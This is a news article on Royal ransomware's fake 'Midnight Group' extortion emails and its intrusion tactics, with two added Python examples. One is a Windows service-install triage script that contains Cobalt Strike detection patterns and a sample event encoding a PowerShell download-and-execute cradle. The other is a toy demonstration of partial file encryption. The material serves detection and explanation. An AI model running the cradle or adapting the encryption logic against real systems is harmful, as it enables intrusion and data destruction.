Fake Data Theft Proof Leads to Royal Ransomware Outbreak



Tranche of Stolen Data Is Disguised Royal Ransomware Installer, Researchers Warn


Hacking is hard. Having users install their own ransomware is much easier, a Russian-speaking threat group has concluded.


The Royal ransomware group – another offshoot of the disbanded Conti group – appears to have targeted at least 50 organizations with a social engineering attack designed to trick victims into trusting the attackers, said researchers at threat intelligence firm Red Sense.

The firm last month identified a spam campaign that appears to trace to Royal and that layers on the deception, first by falsely notifying victims that they’ve been attacked by a ransomware group and then by pressuring them into opening a file that purportedly lists what was stolen but is really a malware loader.

If the victim falls for the social engineering attack, they really might fall victim to ransomware.

The scheme may have even concocted a fake ransomware group: the Midnight Group, said Yelisey Bohuslavskiy, Red Sense’s chief research officer.

Incident response firm Arete recently detailed these Midnight Group attacks, assessing that the group’s claims to have infected victims with ransomware appeared to be fake. “Victims of this fraud campaign receive emails claiming the Midnight Group was behind the original ransomware attack, and their data will be posted on the dark web if they do not pay,” Arete reported.

Red Sense says the deception goes even deeper – that Midnight is itself a fake scheme likely cooked up by Royal. This assessment is based in part on the attack telemetry and malware used by the attackers, as well as the emails received by victims.

The ploy – scaring victims into thinking their systems have been locked by ransomware and then manipulating them into installing the actual ransomware – is a variation of a gambit known as BazarCall, a “callback phishing” tactic pioneered by Conti. Victims receive an email, typically a bogus subscription or invoice notice, urging them to call a phone number; the attackers who answer pose as technical support staff at a software vendor or a food-delivery company and talk the victim into installing remote control software. Once they have that access, attackers install malware and push further into the network before stealing data and crypto-locking as many files as possible.

Post-Conti Groups

Royal is an outgrowth of Conti, which splintered about a year ago after a disastrous decision to publicly back the Kremlin in its war of choice against Ukraine, a stand that dried up victims’ willingness to pay extortion.

The Royal group today counts “between 50 and 60 people” as participants, but most of them are “working in small teams” of four or five people who collaborate to find and take down new victims, Bohuslavskiy said.

When the Royal group first launched in early 2022, it used various types of ransomware, although none of its own design, researchers reported. In September 2022, the group began deploying its own ransomware, which appends .royal to the end of encrypted files. The group’s initial ransom demands often ranged from $250,000 to over $2 million, researchers said at the time.

In December 2022, U.S. officials warned that Royal appeared to be amassing healthcare targets. Last month, they said that the overall volume of the group’s attacks appeared to be picking up steam.

“They have escalated their attacks to focus on top tier-corporations for larger ransoms,” security researchers Laurie Iacono and Stephen Green at incident response firm Kroll reported in February. “Although known for using the double extortion method of both encrypting and exfiltrating data, as of this writing the group does not have a data leak site where they publish the names of their victims.”

Red Sense’s Bohuslavskiy said Royal is one of a number of groups that have opted to not run dedicated data leak sites, since they have become a focus for disruption by law enforcement agencies. Given that many ransomware-as-a-service groups use data leak sites in part to coordinate operations and shakedowns with their affiliates, disrupting such a site can lead to a massive loss in revenue for attackers, as the international takedown of Hive demonstrated (see: Ransomware Groups Seek Fresh Tactics Following Hive Takedown).

Target: Windows and Linux

Using BazarCall strategies isn’t the only trick up Royal’s sleeve. While the group’s initial ransomware targeted Windows systems, researchers last month spotted a new variant designed to infect Linux systems.

“The two executables are somewhat similar in functioning, barring some different modules, such as the existence of a network scanner in the Windows version, while the Linux version can shut ESXi virtual machines down,” security researchers Alexandre Mundo and Max Kersten at Trellix said in a research report released Tuesday.

To demonstrate some of the group’s tactics, techniques and procedures, Trellix published details of an incident response engagement it handled at the end of last year against a victim it declined to identify.

Trellix said this Royal ransomware attack began with a phishing email that instructed the recipient to download a file that eventually executed a Qbot payload, which is also used by some other post-Conti groups.

About four hours into the attack, “Cobalt Strike was installed as a service on a domain controller,” and attackers began moving laterally, escalating privileges and running PowerShell scripts, the Trellix researchers said. Several days later, attackers exfiltrated over 25 gigabytes of data, and a few days after that they unleashed Royal ransomware, which uses partial encryption, encrypting only a portion of each file, to lock files faster.
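The service-installation step in that timeline is one of the few points where the intrusion leaves a clean, durable log record: Windows writes a System log event with ID 7045 whenever a new service is registered. As an added example (not Trellix’s tooling or anything recovered from the attackers), the script below triages 7045 events exported as key="value" lines for the pattern described above: a beacon installed as a service on a domain controller, and a service whose command line is hidden-window, base64-encoded PowerShell. The domain controller hostnames, the export format and the sample events are constructed assumptions; the 7-character random service name and the \\127.0.0.1\ADMIN$ image path are documented Cobalt Strike psexec defaults, not something the article states about this incident.

```python
"""Triage Windows "service was installed" events (System log, Event ID 7045)
for the pattern Trellix describes: a Cobalt Strike beacon installed as a
service on a domain controller, plus encoded PowerShell.

Added example, not Trellix's or the attackers' code. The events below are
constructed; the DC hostname list and the key="value" export format are
assumptions about the environment.
"""
import base64
import re

# Assumption: short hostnames of the domain controllers in this environment.
DOMAIN_CONTROLLERS = {"DC01", "DC02"}

# Cobalt Strike's psexec lateral-movement option installs a service with a
# 7-character random alphanumeric name, run from \\127.0.0.1\ADMIN$\<random>.exe.
RANDOM_NAME = re.compile(r"^[A-Za-z0-9]{7}$")
ADMIN_SHARE = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\", re.I)
# Service binaries in user-writable directories.
USER_WRITABLE = re.compile(r"\\(?:Temp|ProgramData|Users\\Public|Windows\\Tasks)\\", re.I)
# powershell -e/-enc/-EncodedCommand <base64 of UTF-16LE script>, and hidden windows.
ENCODED_PS = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def parse_event(line):
    """Parse one key="value" exported event into a dict."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def decode_encoded_command(blob):
    """-EncodedCommand payloads are base64 over UTF-16LE text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le", "ignore")
    except ValueError:
        return ""


def analyze(line):
    """Return (severity, reasons) for a 7045 event, or None for other event IDs."""
    ev = parse_event(line)
    if ev.get("EventID") != "7045":
        return None
    host = ev.get("Computer", "").split(".")[0].upper()
    name = ev.get("ServiceName", "")
    image = ev.get("ImagePath", "")
    reasons = []
    if host in DOMAIN_CONTROLLERS:
        reasons.append("new service on a domain controller")
    if RANDOM_NAME.match(name):
        reasons.append("7-char random service name (Cobalt Strike psexec default)")
    if ADMIN_SHARE.search(image):
        reasons.append("binary run from \\\\127.0.0.1\\ADMIN$ (Cobalt Strike psexec default)")
    if USER_WRITABLE.search(image):
        reasons.append("binary in user-writable directory")
    if HIDDEN_WINDOW.search(image):
        reasons.append("hidden-window PowerShell")
    m = ENCODED_PS.search(image)
    if m:
        reasons.append("encoded PowerShell: " + decode_encoded_command(m.group(1))[:80])
    if not reasons:
        return ("info", reasons)
    return ("high" if len(reasons) >= 2 else "medium", reasons)


def triage(lines):
    """Run analyze() over an export and keep everything above 'info'."""
    findings = []
    for line in lines:
        result = analyze(line)
        if result and result[0] != "info":
            findings.append((parse_event(line).get("ServiceName"), result[0], result[1]))
    return findings


# Constructed sample export (not real telemetry). The encoded command is a
# typical one-line download cradle, built here so the base64 is valid.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    'EventID="7045" Computer="DC01.corp.local" ServiceName="Xk3mQ9a" '
    'ImagePath="\\\\127.0.0.1\\ADMIN$\\a8f2c1d.exe" StartType="demand start"',
    'EventID="7045" Computer="WS042.corp.local" ServiceName="UpdaterSvc" '
    f'ImagePath="%COMSPEC% /c powershell -nop -w hidden -enc {_ENC}" StartType="auto start"',
    'EventID="7045" Computer="WS042.corp.local" ServiceName="SpoolHelper" '
    'ImagePath="C:\\Program Files\\Vendor\\spoolhelper.exe" StartType="auto start"',
    'EventID="7036" Computer="DC01.corp.local" ServiceName="Xk3mQ9a" ImagePath=""',
]

if __name__ == "__main__":
    for name, severity, reasons in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {name}: {'; '.join(reasons)}")
```

Two of the four constructed events surface: the domain-controller service scores high on three independent indicators, and the workstation service scores high because hidden-window plus encoded PowerShell appear together, with the decoded cradle included in the finding so an analyst does not have to decode it by hand. A legitimately installed vendor service and a non-7045 event are dropped. The 7-character name check is a weak signal on its own (plenty of benign services have seven-letter names), which is why severity is driven by the number of corroborating indicators rather than any single match.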

“The ransomware’s encryption scheme seems to be implemented properly,” the researchers said, meaning they found no flaw in the implementation that defenders could exploit to recover files without the key. “As such, recent backups or a decryptor are the only ways to recover lost files.”
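The partial encryption mentioned above and the recovery verdict here are two sides of the same design: touching only part of each file makes the run faster and quieter, while still leaving nothing a defender can use to get the key back. The following added example (not Royal’s code and not Trellix’s analysis tooling) makes that concrete. It encrypts the first 1 KiB of every 4 KiB window of a constructed low-entropy document, then scans the result two ways: whole-file entropy, as a naive detector would, and per-chunk entropy. The window sizes and the SHA-256 counter-mode keystream are illustrative assumptions standing in for the real cipher and parameters, which the article does not give.

```python
"""Intermittent ("partial") encryption and what it does to entropy scans.

Added example; not Royal's code and not Trellix's analysis tooling. The
stride/length parameters and the SHA-256 counter-mode keystream are toy
stand-ins for the real scheme, chosen so the block runs with the stdlib.
"""
import hashlib
import math
from collections import Counter


def keystream(key, nbytes):
    """Toy counter-mode keystream: SHA-256(key || counter), block by block."""
    out = bytearray()
    counter = 0
    while len(out) < nbytes:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:nbytes])


def partial_xor(data, key, stride=4096, enc_len=1024):
    """XOR the first enc_len bytes of every stride-byte window with keystream.

    Each window is keyed by (key, window offset) so no keystream is reused.
    Symmetric: applying it twice with the same key restores the input.
    Returns (output, bytes_touched).
    """
    buf = bytearray(data)
    touched = 0
    for start in range(0, len(buf), stride):
        end = min(start + enc_len, len(buf))
        ks = keystream(key + start.to_bytes(8, "big"), end - start)
        for i in range(start, end):
            buf[i] ^= ks[i - start]
        touched += end - start
    return bytes(buf), touched


def shannon_entropy(buf):
    """Bits per byte, 0.0 for empty input, 8.0 for uniformly random bytes."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def chunk_entropies(buf, chunk=1024):
    return [shannon_entropy(buf[i:i + chunk]) for i in range(0, len(buf), chunk)]


def scan(buf, chunk=1024, threshold=7.0):
    """Return (whole_file_entropy, fraction_of_chunks_above_threshold)."""
    ents = chunk_entropies(buf, chunk)
    high = sum(e > threshold for e in ents)
    return shannon_entropy(buf), high / len(ents)


# Constructed sample: a 64 KiB "document" of repeated text (low entropy).
PLAINTEXT = (b"Quarterly revenue summary, prepared for the board. " * 2000)[:65536]
KEY = b"example-key-not-a-real-one"  # assumption: any fixed secret works here


def demo():
    """Encrypt, scan, decrypt; return the numbers a practitioner cares about."""
    enc, touched = partial_xor(PLAINTEXT, KEY)
    whole, frac = scan(enc)
    dec, _ = partial_xor(enc, KEY)
    return {
        "bytes_touched_fraction": touched / len(PLAINTEXT),
        "whole_file_entropy": whole,
        "high_entropy_chunk_fraction": frac,
        "plaintext_high_chunk_fraction": scan(PLAINTEXT)[1],
        "roundtrip_ok": dec == PLAINTEXT,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Only a quarter of the bytes are rewritten, yet every 4 KiB window has lost its first kilobyte, so the document is unusable. The whole-file entropy stays well under the 7.0 threshold that simple scanners use, because three quarters of the bytes are still plain text; the per-chunk scan, by contrast, reports exactly 25% of chunks at near-random entropy, which is the signature to look for. The untouched spans reveal nothing about the key (no keystream was applied to them), so partial coverage does not create a decryption shortcut; absent an implementation flaw, that leaves backups or the attackers’ decryptor, as the Trellix researchers say.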

